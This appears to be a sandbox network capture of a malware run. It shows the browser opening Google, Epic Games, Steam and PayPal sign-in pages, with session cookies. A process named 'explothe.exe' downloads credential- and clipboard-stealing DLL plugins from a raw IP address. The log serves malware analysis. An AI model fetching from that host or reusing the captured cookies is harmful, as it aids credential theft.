user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __Host-GAPS=1:_mDlHTJm9LOuksrrW5dtRaMcF5ZuKQ:s3pVq-SSjVto4rfT

Response

HTTP/2.0 302

content-type: application/binary
set-cookie: __Host-GAPS=1:9rj6XanEZwvJMvtexxs8uOdZ3v9UJQ:jNXY1Cenwroeo7RI; Expires=Wed, 29-Oct-2025 06:48:46 GMT; Path=/; Secure; HttpOnly; Priority=HIGH
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Mon, 30 Oct 2023 06:48:46 GMT
location: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en&passive=true&service=youtube&uilel=3&ifkv=AVQVeyxutLZaXVHSQa0NBcD2788IdSVGgczGGoXoL5pYcMIMOgtfaDOItlTsD3m7jlTStlWKtvXwhQ
strict-transport-security: max-age=31536000; includeSubDomains
content-security-policy: require-trusted-types-for 'script';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport
content-security-policy: script-src 'unsafe-inline' https: http:;object-src 'none';base-uri 'self';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport;worker-src 'self'
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: unsafe-none
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
server: ESF
content-length: 0
x-xss-protection: 0
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://static-assets-prod.unrealengine.com/account-portal/static/epic-favicon-96x96.png

MicrosoftEdge.exe

Remote address:

18.239.36.22:443

Request

GET /account-portal/static/epic-favicon-96x96.png HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
dnt: 1

Response

HTTP/2.0 200

content-type: image/png
content-length: 5649
last-modified: Mon, 11 Sep 2023 16:46:02 GMT
x-amz-server-side-encryption: AES256
accept-ranges: bytes
server: AmazonS3
date: Thu, 12 Oct 2023 13:15:46 GMT
etag: "c94a0e93b5daa0eec052b89000774086"
vary: Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method,Origin
x-cache: Hit from cloudfront
via: 1.1 f6b9514ab9239076a9af0bb69d273eb8.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: _g9ROAUdT_PFnj6L9j1CqHLwoRNOToKMxeyvN4dBjsZY3L6Z7fnfIA==
age: 1532001
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response
DNS

talon-website-prod.ecosec.on.epicgames.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

talon-website-prod.ecosec.on.epicgames.com

IN A

Response

talon-website-prod.ecosec.on.epicgames.com

IN CNAME

talon-website-prod.ecosec.on.epicgames.com.cdn.cloudflare.net

talon-website-prod.ecosec.on.epicgames.com.cdn.cloudflare.net

IN A

172.64.146.120

talon-website-prod.ecosec.on.epicgames.com.cdn.cloudflare.net

IN A

104.18.41.136
GET

https://talon-website-prod.ecosec.on.epicgames.com/talon_sdk.js

MicrosoftEdgeCP.exe

Remote address:

172.64.146.120:443

Request

GET /talon_sdk.js HTTP/2.0
host: talon-website-prod.ecosec.on.epicgames.com
accept: application/javascript, */*;q=0.8
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: _epicSID=dddac527ae1a44b2ac7563ff46bce1ba; EPIC_DEVICE=eb4ae73b5ac94830876e9e283b0a0824

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:59 GMT
content-type: application/javascript
last-modified: Fri, 12 May 2023 21:07:43 GMT
etag: W/"645eaa9f-1381f7"
cache-control: public, max-age=300
cf-cache-status: HIT
age: 192
set-cookie: __cf_bm=HK2CjMAqRnrXUBRUhK6IWdm9nqxKMv9WmOuNTqaVrFM-1698648539-0-AUnw/rdjEWqq4T87af4s6kIbiQQA6yAw1bLiEVYAF29YD2aoWpGtqPQKTntOViBEqJ9AV1cccBxGqt7Q54hD5vY=; path=/; expires=Mon, 30-Oct-23 07:18:59 GMT; domain=.ecosec.on.epicgames.com; HttpOnly; Secure
vary: Accept-Encoding
strict-transport-security: max-age=15552000; includeSubDomains; preload
server: cloudflare
cf-ray: 81e1b73bee7db6fb-AMS
content-encoding: br
alt-svc: h3=":443"; ma=86400
DNS

120.146.64.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

120.146.64.172.in-addr.arpa

IN PTR

Response
GET

http://77.91.124.1/theme/Plugins/cred64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/cred64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:59 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
GET

http://77.91.124.1/theme/Plugins/clip64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/clip64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 200 OK

Date: Mon, 30 Oct 2023 06:48:59 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 30 Sep 2023 10:50:50 GMT
ETag: "16400-60691507c5cc0"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
DNS

api.steampowered.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

api.steampowered.com

IN A

Response

api.steampowered.com

IN A

23.207.106.113
POST

https://api.steampowered.com/IClientMetricsService/ReportClientError/v1

MicrosoftEdgeCP.exe

Remote address:

23.207.106.113:443

Request

POST /IClientMetricsService/ReportClientError/v1 HTTP/2.0
host: api.steampowered.com
origin: https://steamcommunity.com
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
content-type: multipart/form-data; boundary=---------------------------7e72893840432
accept-encoding: gzip, deflate, br
content-length: 1221
cache-control: no-cache

Response

HTTP/2.0 200

server: nginx
content-length: 0
access-control-allow-origin: https://steamcommunity.com
vary: Origin
access-control-expose-headers: X-eresult, X-error_message
expires: Mon, 30 Oct 2023 06:49:03 GMT
cache-control: max-age=0, no-cache, no-store
pragma: no-cache
date: Mon, 30 Oct 2023 06:49:03 GMT
POST

https://api.steampowered.com/IClientMetricsService/ReportClientError/v1

MicrosoftEdgeCP.exe

Remote address:

23.207.106.113:443

Request

POST /IClientMetricsService/ReportClientError/v1 HTTP/2.0
host: api.steampowered.com
origin: https://steamcommunity.com
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
content-type: multipart/form-data; boundary=---------------------------7e72c740432
accept-encoding: gzip, deflate, br
content-length: 2757
cache-control: no-cache

Response

HTTP/2.0 200

server: nginx
content-length: 0
access-control-allow-origin: https://steamcommunity.com
vary: Origin
access-control-expose-headers: X-eresult, X-error_message
expires: Mon, 30 Oct 2023 06:49:08 GMT
cache-control: max-age=0, no-cache, no-store
pragma: no-cache
date: Mon, 30 Oct 2023 06:49:08 GMT
DNS

crl.rootca1.amazontrust.com

MicrosoftEdge.exe

Remote address:

8.8.8.8:53

Request

crl.rootca1.amazontrust.com

IN A

Response

crl.rootca1.amazontrust.com

IN A

18.65.40.94

crl.rootca1.amazontrust.com

IN A

18.65.40.199

crl.rootca1.amazontrust.com

IN A

18.65.40.98

crl.rootca1.amazontrust.com

IN A

18.65.40.48
GET

http://crl.rootca1.amazontrust.com/rootca1.crl

MicrosoftEdge.exe

Remote address:

18.65.40.94:80

Request

GET /rootca1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: crl.rootca1.amazontrust.com

Response

HTTP/1.1 200 OK

Content-Type: application/pkix-crl
Content-Length: 651
Connection: keep-alive
Date: Thu, 25 May 2023 00:31:00 GMT
Last-Modified: Thu, 25 May 2023 00:16:34 GMT
ETag: "9058c82ab542b2701eb78e0a4e482593"
x-amz-server-side-encryption: AES256
Cache-Control: public
Expires: Mon, 20 May 2024 20:13:06 GMT
x-amz-version-id: jp0NT7VkGOm4vGsuA2lczqulWP4uBCNG
Accept-Ranges: bytes
Server: AmazonS3
X-Cache: Hit from cloudfront
Via: 1.1 29676c2ee539645954aa742bde1ce894.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS1-P1
X-Amz-Cf-Id: jCrwYWZ7QydpMPemApmY41rZUbqn5eUjvcCvwmXHMsYw6-FKuGGL0w==
Age: 13673886
DNS

94.40.65.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

94.40.65.18.in-addr.arpa

IN PTR

Response

94.40.65.18.in-addr.arpa

IN PTR

server-18-65-40-94ams1r cloudfrontnet
POST

https://api.steampowered.com/IClientMetricsService/ReportClientError/v1

MicrosoftEdgeCP.exe

Remote address:

23.207.106.113:443

Request

POST /IClientMetricsService/ReportClientError/v1 HTTP/2.0
host: api.steampowered.com
origin: https://store.steampowered.com
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
content-type: multipart/form-data; boundary=---------------------------7e73d1240432
accept-encoding: gzip, deflate, br
content-length: 1243
cache-control: no-cache

Response

HTTP/2.0 200

server: nginx
content-length: 0
access-control-allow-origin: https://store.steampowered.com
vary: Origin
access-control-expose-headers: X-eresult, X-error_message
expires: Mon, 30 Oct 2023 06:49:07 GMT
cache-control: max-age=0, no-cache, no-store
pragma: no-cache
date: Mon, 30 Oct 2023 06:49:07 GMT
POST

https://api.steampowered.com/IClientMetricsService/ReportClientError/v1

MicrosoftEdgeCP.exe

Remote address:

23.207.106.113:443

Request

POST /IClientMetricsService/ReportClientError/v1 HTTP/2.0
host: api.steampowered.com
origin: https://store.steampowered.com
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
content-type: multipart/form-data; boundary=---------------------------7e7395f40432
accept-encoding: gzip, deflate, br
content-length: 2663
cache-control: no-cache

Response

HTTP/2.0 200

server: nginx
content-length: 0
access-control-allow-origin: https://store.steampowered.com
vary: Origin
access-control-expose-headers: X-eresult, X-error_message
expires: Mon, 30 Oct 2023 06:49:19 GMT
cache-control: max-age=0, no-cache, no-store
pragma: no-cache
date: Mon, 30 Oct 2023 06:49:19 GMT
DNS

talon-service-prod.ecosec.on.epicgames.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

talon-service-prod.ecosec.on.epicgames.com

IN A

Response

talon-service-prod.ecosec.on.epicgames.com

IN CNAME

talon-service-prod.ecosec.on.epicgames.com.cdn.cloudflare.net

talon-service-prod.ecosec.on.epicgames.com.cdn.cloudflare.net

IN A

172.64.146.120

talon-service-prod.ecosec.on.epicgames.com.cdn.cloudflare.net

IN A

104.18.41.136
OPTIONS

https://talon-service-prod.ecosec.on.epicgames.com/v1/phaser/batch

MicrosoftEdgeCP.exe

Remote address:

172.64.146.120:443

Request

OPTIONS /v1/phaser/batch HTTP/2.0
host: talon-service-prod.ecosec.on.epicgames.com
accept: */*
origin: https://www.epicgames.com
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
access-control-request-headers: Content-Type, X-XSRF-TOKEN
access-control-request-method: POST
accept-encoding: gzip, deflate, br
content-length: 0
cache-control: no-cache

Response

HTTP/2.0 204

date: Mon, 30 Oct 2023 06:49:08 GMT
cf-ray: 81e1b7713a8a0ae3-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://www.epicgames.com
strict-transport-security: max-age=15552000; includeSubDomains; preload
vary: Origin, Access-Control-Request-Method, Access-Control-Request-Headers, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Origin,Content-Length,Content-Type,Authorization,Cookie,X-Xsrf-Token,X-Acid-Argon,X-Acid-Xenon
access-control-allow-methods: GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS
access-control-max-age: 43200
set-cookie: __cf_bm=uQ2EHXIZBzQZcZBbgTWsGx7Ktxn08TUrD.kXi5lsEqQ-1698648548-0-ASvsi6JKVK+1NgL4VGWpXWU/UqZidqRTXhGcwiVRktY5/g4+c4U3rvS+VyD58FL+FXIYEUclXsLCukKjOe7z7MM=; path=/; expires=Mon, 30-Oct-23 07:19:08 GMT; domain=.ecosec.on.epicgames.com; HttpOnly; Secure
server: cloudflare
alt-svc: h3=":443"; ma=86400
OPTIONS

https://talon-service-prod.ecosec.on.epicgames.com/v1/init

MicrosoftEdgeCP.exe

Remote address:

172.64.146.120:443

Request

OPTIONS /v1/init HTTP/2.0
host: talon-service-prod.ecosec.on.epicgames.com
accept: */*
origin: https://www.epicgames.com
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
access-control-request-headers: Content-Type, X-XSRF-TOKEN
access-control-request-method: POST
accept-encoding: gzip, deflate, br
content-length: 0
cache-control: no-cache

Response

HTTP/2.0 204

date: Mon, 30 Oct 2023 06:49:08 GMT
content-type: text/plain; charset=utf-8
cf-ray: 81e1b7724b240ae3-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://www.epicgames.com
strict-transport-security: max-age=15552000; includeSubDomains; preload
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
x-epic-correlation-id: 347f2285-966a-435c-b148-7b123960778d
server: cloudflare
alt-svc: h3=":443"; ma=86400
POST

https://talon-service-prod.ecosec.on.epicgames.com/v1/phaser/batch

MicrosoftEdgeCP.exe

Remote address:

172.64.146.120:443

Request

POST /v1/phaser/batch HTTP/2.0
host: talon-service-prod.ecosec.on.epicgames.com
origin: https://www.epicgames.com
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
content-type: application/json
x-xsrf-token: dfc96122ef234e15ace880165ee8b6b3
accept-encoding: gzip, deflate, br
content-length: 105
cache-control: no-cache
cookie: _epicSID=dddac527ae1a44b2ac7563ff46bce1ba; EPIC_DEVICE=eb4ae73b5ac94830876e9e283b0a0824; __cf_bm=HK2CjMAqRnrXUBRUhK6IWdm9nqxKMv9WmOuNTqaVrFM-1698648539-0-AUnw/rdjEWqq4T87af4s6kIbiQQA6yAw1bLiEVYAF29YD2aoWpGtqPQKTntOViBEqJ9AV1cccBxGqt7Q54hD5vY=

Response

HTTP/2.0 204

date: Mon, 30 Oct 2023 06:49:08 GMT
cf-ray: 81e1b7714a8b0ae3-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://www.epicgames.com
strict-transport-security: max-age=15552000; includeSubDomains; preload
vary: Origin, Access-Control-Request-Method, Access-Control-Request-Headers, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Origin,Content-Length,Content-Type,Authorization,Cookie,X-Xsrf-Token,X-Acid-Argon,X-Acid-Xenon
access-control-allow-methods: GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS
access-control-max-age: 43200
set-cookie: __cf_bm=wKZyBCB29c2M3C6P7ORoqtkXBmmdwTrPqTySiM5NZnc-1698648548-0-Ad3dGdDxMWXI+W9KMhwwtdt7LXqPNWcC6G5FiX7fdGcG49jZCSeJNnQDVY4vulVzS4GsJZeujvmkUj9nT/S4pKc=; path=/; expires=Mon, 30-Oct-23 07:19:08 GMT; domain=.ecosec.on.epicgames.com; HttpOnly; Secure
server: cloudflare
alt-svc: h3=":443"; ma=86400
POST

https://talon-service-prod.ecosec.on.epicgames.com/v1/init

MicrosoftEdgeCP.exe

Remote address:

172.64.146.120:443

Request

POST /v1/init HTTP/2.0
host: talon-service-prod.ecosec.on.epicgames.com
origin: https://www.epicgames.com
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
content-type: application/json
x-xsrf-token: dfc96122ef234e15ace880165ee8b6b3
accept-encoding: gzip, deflate, br
content-length: 31
cache-control: no-cache
cookie: _epicSID=dddac527ae1a44b2ac7563ff46bce1ba; EPIC_DEVICE=eb4ae73b5ac94830876e9e283b0a0824; __cf_bm=HK2CjMAqRnrXUBRUhK6IWdm9nqxKMv9WmOuNTqaVrFM-1698648539-0-AUnw/rdjEWqq4T87af4s6kIbiQQA6yAw1bLiEVYAF29YD2aoWpGtqPQKTntOViBEqJ9AV1cccBxGqt7Q54hD5vY=

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:49:08 GMT
content-type: application/json; charset=utf-8
cf-ray: 81e1b7740c540ae3-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://www.epicgames.com
set-cookie: _tald=4af073e8-c68f-48ef-8eef-2cf2cac63169; Path=/; Domain=.epicgames.com; Max-Age=31536000; Secure; SameSite=None
strict-transport-security: max-age=15552000; includeSubDomains; preload
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
x-epic-correlation-id: 945f61fa-08ad-47ed-a5e7-88b380543495
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
POST

https://talon-service-prod.ecosec.on.epicgames.com/v1/phaser/batch

MicrosoftEdgeCP.exe

Remote address:

172.64.146.120:443

Request

POST /v1/phaser/batch HTTP/2.0
host: talon-service-prod.ecosec.on.epicgames.com
origin: https://www.epicgames.com
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
content-type: application/json
x-xsrf-token: dfc96122ef234e15ace880165ee8b6b3
accept-encoding: gzip, deflate, br
content-length: 632
cache-control: no-cache
cookie: _epicSID=dddac527ae1a44b2ac7563ff46bce1ba; EPIC_DEVICE=eb4ae73b5ac94830876e9e283b0a0824; _tald=4af073e8-c68f-48ef-8eef-2cf2cac63169; __cf_bm=HK2CjMAqRnrXUBRUhK6IWdm9nqxKMv9WmOuNTqaVrFM-1698648539-0-AUnw/rdjEWqq4T87af4s6kIbiQQA6yAw1bLiEVYAF29YD2aoWpGtqPQKTntOViBEqJ9AV1cccBxGqt7Q54hD5vY=

Response

HTTP/2.0 204

date: Mon, 30 Oct 2023 06:49:20 GMT
content-type: text/plain; charset=utf-8
cf-ray: 81e1b7be9f210ae3-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://www.epicgames.com
strict-transport-security: max-age=15552000; includeSubDomains; preload
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
x-epic-correlation-id: 871c0aaf-1f90-4fa3-91db-9dc0d2f4003b
server: cloudflare
alt-svc: h3=":443"; ma=86400
POST

https://talon-service-prod.ecosec.on.epicgames.com/v1/phaser/batch

MicrosoftEdgeCP.exe

Remote address:

172.64.146.120:443

Request

POST /v1/phaser/batch HTTP/2.0
host: talon-service-prod.ecosec.on.epicgames.com
origin: https://www.epicgames.com
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
content-type: application/json
x-xsrf-token: dfc96122ef234e15ace880165ee8b6b3
accept-encoding: gzip, deflate, br
content-length: 697
cache-control: no-cache
cookie: _epicSID=dddac527ae1a44b2ac7563ff46bce1ba; EPIC_DEVICE=eb4ae73b5ac94830876e9e283b0a0824; _tald=4af073e8-c68f-48ef-8eef-2cf2cac63169; __cf_bm=HK2CjMAqRnrXUBRUhK6IWdm9nqxKMv9WmOuNTqaVrFM-1698648539-0-AUnw/rdjEWqq4T87af4s6kIbiQQA6yAw1bLiEVYAF29YD2aoWpGtqPQKTntOViBEqJ9AV1cccBxGqt7Q54hD5vY=

Response

HTTP/2.0 204

date: Mon, 30 Oct 2023 06:49:23 GMT
content-type: text/plain; charset=utf-8
cf-ray: 81e1b7cfcb320ae3-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://www.epicgames.com
strict-transport-security: max-age=15552000; includeSubDomains; preload
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
x-epic-correlation-id: 6114fc28-f3c1-4a41-a56b-0ca6fa50457f
server: cloudflare
alt-svc: h3=":443"; ma=86400
DNS

js.hcaptcha.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

js.hcaptcha.com

IN A

Response

js.hcaptcha.com

IN A

104.19.219.90

js.hcaptcha.com

IN A

104.19.218.90
GET

https://js.hcaptcha.com/1/api.js?onload=hCaptchaLoaded&render=explicit

MicrosoftEdgeCP.exe

Remote address:

104.19.219.90:443

Request

GET /1/api.js?onload=hCaptchaLoaded&render=explicit HTTP/2.0
host: js.hcaptcha.com
accept: application/javascript, */*;q=0.8
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:49:09 GMT
content-type: application/javascript
cf-ray: 81e1b7789af81c7e-AMS
cf-cache-status: HIT
age: 0
cache-control: max-age=120
etag: W/"e06be98cab2cc8ce345b4b2a1694d009"
last-modified: Thu, 26 Oct 2023 14:16:30 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
via: 1.1 7cda9a7fe68f979d43fe743d9fbd0db4.cloudfront.net (CloudFront)
cross-origin-resource-policy: cross-origin
x-amz-cf-id: OenP3rLuf3uTSU3RxSnNKp_T3cjRdT7xbrvpyHyo7XpLAOFBGH-UZA==
x-amz-cf-pop: AMS1-P3
x-amz-server-side-encryption: AES256
x-amz-version-id: UKTZX5KrDdhEiNN0CNv.hmeBgmLTJR.L
x-cache: Hit from cloudfront
x-content-type-options: nosniff
vary: Accept-Encoding
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
DNS

t.paypal.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

t.paypal.com

IN A

Response

t.paypal.com

IN CNAME

t.glb.paypal.com

t.glb.paypal.com

IN CNAME

cs1150.wpc.betacdn.net

cs1150.wpc.betacdn.net

IN A

192.229.221.25
DNS

90.219.19.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

90.219.19.104.in-addr.arpa

IN PTR

Response
GET

https://t.paypal.com/ts?v=1.8.7&t=1698648548391&g=0&pgrp=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&page=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&pgst=1698648501523&calc=0752753582382&nsid=AQUVizFN1FmZUKFC1oFjJpB6tTVjuU55&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=US&csci=236cbef091eb49f2acf1cee5cc5ead9e&comp=authchallengenodeweb&tsrce=authchallengenodeweb&cu=0&ef_policy=ccpa&xe=107585&xt=135393&e=im&imsrc=setup&view=%7B%22t10%22%3A2851%2C%22t11%22%3A31000%2C%22tcp%22%3A14705%2C%22nt%22%3A%22navigate%22%2C%22bt%22%3A26256%7D&cd=24&sw=1280&sh=720&dw=1280&dh=720&bw=800&bh=556&ce=1&t1=2851&t1c=0&t1d=0&t1s=0&t2=267&t3=6278&t4d=0&t4=11586&t4e=14705&tt=14705&rdc=0&res=%7B%7D

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /ts?v=1.8.7&t=1698648548391&g=0&pgrp=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&page=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&pgst=1698648501523&calc=0752753582382&nsid=AQUVizFN1FmZUKFC1oFjJpB6tTVjuU55&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=US&csci=236cbef091eb49f2acf1cee5cc5ead9e&comp=authchallengenodeweb&tsrce=authchallengenodeweb&cu=0&ef_policy=ccpa&xe=107585&xt=135393&e=im&imsrc=setup&view=%7B%22t10%22%3A2851%2C%22t11%22%3A31000%2C%22tcp%22%3A14705%2C%22nt%22%3A%22navigate%22%2C%22bt%22%3A26256%7D&cd=24&sw=1280&sh=720&dw=1280&dh=720&bw=800&bh=556&ce=1&t1=2851&t1c=0&t1d=0&t1s=0&t2=267&t3=6278&t4d=0&t4=11586&t4e=14705&tt=14705&rdc=0&res=%7B%7D HTTP/2.0
host: t.paypal.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: enforce_policy=ccpa; LANG=en_US%3BUS; tsrce=authchallengenodeweb; x-pp-s=eyJ0IjoiMTY5ODY0ODUyMzgzMiIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg15.slc; ts=vreXpYrS%3D1793342923%26vteXpYrS%3D1698650323%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew; ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4; TLTSID=62544276781500915456071760049843

Response

HTTP/2.0 200

cache-control: max-age=0, no-cache, no-store, must-revalidate
content-type: image/gif
correlation-id: d675f201ae3c6
date: Mon, 30 Oct 2023 06:49:10 GMT
expires: Mon, 30 Oct 2023 06:49:10 GMT
p3p: CP="CAO IND OUR SAM UNI STA COR COM"
paypal-debug-id: d675f201ae3c6
pragma: no-cache
server: ECAcc (frc/4CC7)
server-timing: content-encoding;desc="", x-cdn;desc="edgecast"
set-cookie: ts=vreXpYrS%3D1793256550%26vteXpYrS%3D1698650350%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew;Expires=Thu, 29 Oct 2026 06:49:10 GMT;domain=.paypal.com;path=/;secure;HttpOnly;
set-cookie: ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4;Expires=Thu, 29 Oct 2026 06:49:10 GMT;domain=.paypal.com;path=/;secure;
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: *
traceparent: 00-0000000000000000000d675f201ae3c6-fcb487f4a46c7b88-01
vary: Accept-Encoding
GET

https://t.paypal.com/ts?v=1.8.7&t=1698648560659&g=0&e=err&page=main%3Aauthchallenge%3A%3Asignin&pgrp=main%3Aauthchallenge%3A%3Asignin&comp=authchallengenodeweb&erpg=Script%20error&error_type=WINDOW_ONERROR&error_source=-%200%3A0

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /ts?v=1.8.7&t=1698648560659&g=0&e=err&page=main%3Aauthchallenge%3A%3Asignin&pgrp=main%3Aauthchallenge%3A%3Asignin&comp=authchallengenodeweb&erpg=Script%20error&error_type=WINDOW_ONERROR&error_source=-%200%3A0 HTTP/2.0
host: t.paypal.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
